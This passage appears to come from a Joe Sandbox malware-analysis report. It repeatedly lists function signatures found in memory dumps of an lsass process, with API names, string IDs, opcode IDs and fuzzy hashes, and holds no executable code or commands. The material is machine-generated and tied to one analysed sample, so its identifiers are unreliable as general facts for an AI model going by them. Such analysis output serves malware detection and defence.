                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 449555515-0
                                                                                                                            • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                            • Instruction ID: 4cb24c3c5e9fa141b5df1c6a7c4a8c5dc67f34b77b6b13790439d7932f787d30
                                                                                                                            • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                            • Instruction Fuzzy Hash: 320129A6611F808AFF659B22F81C71963B0BB49BC6F04042ACE4E07B64EF3DC919C704
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 449555515-0
                                                                                                                            • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                            • Instruction ID: 5943fd1580f195d897b2e34406dc4c73d414428226e3b4fba73f933aef0dc032
                                                                                                                            • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                            • Instruction Fuzzy Hash: 700117A5226F44CAFB249B22F81D31963B0BB49BD6F44442ACD4E07B65EF3DC9098704
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                            • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                            • Instruction ID: 3b0e631b75504db4463a701d796cd14c903cf2e77cba2ed9bb482b335b50820a
                                                                                                                            • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                            • Instruction Fuzzy Hash: 7C518AB2601A408EEB16DF15F85CB5937A6F384BC8F55852ADE0B67B88DB39DD81C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                            • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                            • Instruction ID: 3d0dd3fe079ada4bd8f2881e167f80dd78136bc046453439a47d5902b6e11c02
                                                                                                                            • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                            • Instruction Fuzzy Hash: 3851AEB2611A068EEB14CB15F85DB5937A6F384BE8F50C52BDA0B47B88DB39CC51C710
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                                            • String ID: \\?\
                                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                                            • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                            • Instruction ID: 4e9ba4edf0bbd33cff3169a5f2e833e07c5858e7a55cb809dc8132ebdd723377
                                                                                                                            • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                            • Instruction Fuzzy Hash: 9CF044A2314A4596EB609B21F8CC75967A0F748BD9F948022DA4E47D54DF7CCA4DCB00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CombinePath
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                            • Instruction ID: 3e4723502f59a8f1e07ded70428830228723a6d762285bf7447ffc8a7d9f86c1
                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                            • Instruction Fuzzy Hash: 16F01CA6714FC486EA548F57B91C11966A1BB58FE0F089132EE4F57F18DF3CC8558700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                            • Instruction ID: 23a4a7cfba681eafd7acd153de910ccfab7048bd4207ecad1fa1577b34c1d807
                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                            • Instruction Fuzzy Hash: 55F06DA2211E8585EB248F24F84C3696330EB99BE5F94121ACE6F46AE4CF2CC9488340
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CombinePath
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                            • Instruction ID: cfbdc10649159751a95959a064a02ea57873d56d1913454f7108c669402796ba
                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                            • Instruction Fuzzy Hash: 87F01CA5728F8487EB549B57B91C15966A1AB48FE0F089132EE4F47F18DF3CC8498700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                            • Instruction ID: 20a96c496cc53890de35e1815668b95711ddb10070cf0e2248e09b86cfad44e8
                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                            • Instruction Fuzzy Hash: D2F062E1325F058AEB108B25F44D3696320EB847F5F54421BCA6F469E4DF2CC9458300
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2882836952-0
                                                                                                                            • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                            • Instruction ID: 42075970a9a9322463efdc1a56445cb29a1d8840ca77651260a4224c7a6fbde6
                                                                                                                            • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                            • Instruction Fuzzy Hash: 7302B576219B848AEB61CF55F49835AB7A1F3857D4F100016EA8E97BA9DB7CC884CF00
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2882836952-0
                                                                                                                            • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                            • Instruction ID: c328fe901491eadfcf133f95a27b323ab66784f069a122bcab713d23c3b0d380
                                                                                                                            • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                            • Instruction Fuzzy Hash: 08029576219B888AEB60CB55F49975AB7A1F3847D4F104017EA8E87BA8DB7CC844CF40
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2882836952-0
                                                                                                                            • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                            • Instruction ID: 3ee684a2051b0626537bb21df19f72d7656a23c79b275dde9432cc418d5cd82d
                                                                                                                            • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                            • Instruction Fuzzy Hash: 4461B2B6529E84CAEA618F15F49D31AB7A1F3897C4F100116EA8E57FA8DB7CC841CF40
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2882836952-0
                                                                                                                            • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                            • Instruction ID: 423d1428fd4ff0a79e18e4ef71d5da1a7ab2de87cb8d2211654a8246bf336b50
                                                                                                                            • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                            • Instruction Fuzzy Hash: 726198B6529E84CAEA608B15F49D31AB7A0F3887D4F504117EA8E47FA8DB7CC940CF44
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _set_statfp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156100317-0
                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction ID: 424267331a93190a57d2639305031bc8998964835541697d1ff8627115ec689c
                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction Fuzzy Hash: E11173A7B10FD119F7641768F45D36621416F783F8F280626EA7F17ED6CA6CCC418200
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _set_statfp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156100317-0
                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction ID: ab6350854940c6af69b0ba6188dba2f6dddd4797bab6a4e6d4c76438ca6c93bc
                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction Fuzzy Hash: B21170B2B3CF512BF6641768F85E36A11416B783F8F190626AD7F17EE6CA2CCC418600
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _set_statfp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156100317-0
                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction ID: ba703c9331ee713b56c495894a3d73b0a2062aaebb232e8d6e30e25fb009abb4
                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction Fuzzy Hash: 12117323A14E5119FBA41769F45D36911816BD93F4F889A3AAA770FFDECA2CCC45C110
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                            • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                                                            • API String ID: 3215553584-4202648911
                                                                                                                            • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                            • Instruction ID: e6160abfd5a2cc9cf80f440168c8954cb50692cc9a53660c5a43eaca46e9ff2f
                                                                                                                            • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                            • Instruction Fuzzy Hash: C3619C72601E448AFA6DCB69F54C32AAAA1A7C67C0F55451BCA0B07FECDB3DCE458301
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction ID: 1d7432d42cb839326b1ec519d8e3b4db095f3ae002e7f932d77f27b7b20c2c01
                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction Fuzzy Hash: 556158B7600B848AEB22DFA5E44879D77A0F344BDCF044616EE4E27B98DB78C995C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction ID: c18034dbc11df50b6c50a04c626263d301c1f4bb62dfaf7106fd9405434fbc65
                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction Fuzzy Hash: 7E6149B2600B888AEB109FA5E44939D77A1F344B98F188617EF4E17B98DB78C995C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction ID: a1fa52ff5b8a92164aef8a90dc21d442fce71749ed4764205dc9c63b39132c2b
                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction Fuzzy Hash: 72517CB6100AC08EEB668FA5A48C35977A0F354BD9F144217DA9EA7FD5CB3CD891C701
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction ID: 6c289e620df851ebce735931ffc488a850c5cb96559f84f67767045b8f16be73
                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction Fuzzy Hash: 81517FB6100A888EEB648BA5A58E35977A0F354BD5F18D117EA6E47FD5CB3CD890C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction ID: cfee3a79a6332420dfddfd621a8844a6e200f43d99eb8e2e0c62dd5cb1a16251
                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction Fuzzy Hash: 89517C32100A80CEEB64CB25A54C35877A1F795BD4F288217DA9A87FD9CB7CDA90CB11
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction ID: 972f85bd260c2ee75a15eccb82eca9add97efd3e6d8f92d2c71b54b9a0724d42
                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction Fuzzy Hash: 07518832601A028EEF64CB16F44CB1937A5F3D4BD8F558526DA1747B8CEB39DE418B04
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction ID: fac092133bcf5273d306a1bfba47854e7a8849c5731493164c1dc531c6143850
                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction Fuzzy Hash: D6314672601A419AEB14DF12F84CB5977A4F780BD8F15852AAE6B07B8CDB3CCE41CB04
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2718003287-0
                                                                                                                            • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                            • Instruction ID: 46840878b0cc5d224b34d7d0e9dac87f5955736167c6a31398be0b02f4667bf4
                                                                                                                            • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                            • Instruction Fuzzy Hash: CED1BFB7714A808DE711CFA9E44829C3BB1F7547D8F14421ADE5E9BF99DA38C906C780
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2718003287-0
                                                                                                                            • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                            • Instruction ID: dd6b672a2f53368aeb54a6d8b34fc846c483bef90cf2183bad398aa3b9cfd3a2
                                                                                                                            • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                            • Instruction Fuzzy Hash: B2D1D3B2728A808EE711CF69E44839C3BB1F3547E8F54421ADE5E97F99DA38C906C750
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 953036326-0
                                                                                                                            • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                            • Instruction ID: c9214aef26bfacb35296ae088b721dff4a15a35e123c9ee8ba9635ca1e8333b4
                                                                                                                            • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                            • Instruction Fuzzy Hash: 5A9177A7700E909DFB649F65A48C3AD2BA0A754BC8F54410EDE4F67E95DB78C882C700
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 953036326-0
                                                                                                                            • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                            • Instruction ID: c2b03503795149f622d0d89a93b7de4d96344e6466bbe8adc369801a5628b75e
                                                                                                                            • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                            • Instruction Fuzzy Hash: 1D918DB2628E509EF7609F65A45C3AD2FA0B744BE8F54410EDE4F67E95DA38CC82C700
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2933794660-0
                                                                                                                            • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                            • Instruction ID: 46c5aac05c874f4bb09711078cff6ceae9bbf1676f6b8508b6834c3418bbca38
                                                                                                                            • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                            • Instruction Fuzzy Hash: 30111C66710F418AEF008F60E8993A833A4F719798F440E22DE6E46BA4DB7CD5998380
                                                                                                                            APIs
